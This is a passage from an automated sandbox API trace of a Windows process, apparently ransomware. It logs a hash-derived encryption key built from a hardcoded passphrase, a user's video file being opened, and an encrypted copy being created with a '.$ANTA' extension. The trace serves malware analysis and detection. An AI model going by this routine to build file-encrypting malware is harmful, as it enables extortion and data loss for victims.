dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0101.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca718, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0101.642] CloseHandle (hObject=0x258) returned 1 [0101.642] FreeLibrary (hLibModule=0x772d0000) returned 1 [0101.642] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0101.642] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\h8KMQ6UP_q4ir-v.mp4", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeecd3cc0, ftCreationTime.dwHighDateTime=0x1d5e0e8, ftLastAccessTime.dwLowDateTime=0x2e368a50, ftLastAccessTime.dwHighDateTime=0x1d5e1ee, ftLastWriteTime.dwLowDateTime=0x2e368a50, ftLastWriteTime.dwHighDateTime=0x1d5e1ee, nFileSizeHigh=0x0, nFileSizeLow=0x15742, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="h8KMQ6UP_q4ir-v.mp4", cAlternateFileName="H8KMQ6~1.MP4")) returned 0x41ac140 [0101.642] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0101.642] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0101.643] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0101.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0101.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ec8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0101.643] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a5250) returned 1 [0101.644] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0101.644] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0101.694] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0101.694] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0101.694] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.694] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0101.694] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.694] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0101.694] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cad30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0101.694] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0101.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0101.694] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0101.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0101.695] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cac40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0101.695] CryptHashData (hHash=0x41ac280, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0101.695] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.695] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0101.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cad78, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0101.695] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac280, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac140) returned 1 [0101.695] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0101.695] CryptDestroyHash (hHash=0x41ac280) returned 1 [0101.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0101.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0101.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0101.697] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0101.697] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0101.697] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0101.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0101.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0101.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0101.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0101.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0101.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0101.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0101.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0101.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0101.698] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\h8KMQ6UP_q4ir-v.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\h8kmq6up_q4ir-v.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0101.698] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.698] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0101.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0101.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0101.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0101.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0101.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0101.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0101.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0101.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.698] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0101.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0101.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0101.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0101.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0101.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0101.699] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0101.699] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0101.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0101.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0101.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0101.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0101.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0101.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0101.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0101.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0101.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x43ec9b8 [0101.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0101.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0101.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0101.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ec9b8 | out: hHeap=0x1780000) returned 1 [0101.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0101.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0101.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0101.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0101.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0101.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0101.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0101.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0101.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0101.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0101.701] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd")) returned 0x10 [0101.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0101.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0101.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0101.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0101.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0101.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0101.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0101.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0101.701] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\h8KMQ6UP_q4ir-v.mp4.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\h8kmq6up_q4ir-v.mp4.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0101.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0101.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0101.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0101.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0101.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0101.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0101.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 